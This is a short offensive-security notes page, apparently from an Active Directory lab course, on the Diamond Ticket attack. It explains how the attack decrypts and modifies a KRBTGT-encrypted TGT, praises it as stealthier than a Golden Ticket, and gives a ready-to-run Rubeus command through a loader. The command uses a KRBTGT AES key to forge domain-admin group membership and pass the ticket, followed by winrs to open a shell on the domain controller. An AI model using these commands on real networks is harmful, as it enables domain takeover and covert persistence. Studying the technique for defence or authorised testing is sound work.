Diamond Ticket
Diamond Ticket
Diamond Ticket attack decrypts the TGT, modifying it and re-encrypting it using the AES keys of the KRBTGT account. Golden Ticket was TGT forging attack whereas diamond ticket is a TGT modification attack.
A diamond ticket is more opsec safe as it has:
Valid ticket times because a
TGT
issued by the DC is modifiedIn golden ticket, there is no corresponding
TGT
request for TGS/Service ticket requests as theTGT
is forged.
A diamond ticket should be chosen over a golden ticket in a real assessment.
In the below command, we modify the TGT after decryption with the user account and group we want.
# Open cmd with elevated privs
# KRBKEY is same as KRBTGT account's RC4/AES key
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
# This should spawn a new admin shell via which we can get any user's shell.
winrs -r:dcorp-dc cmd
Last updated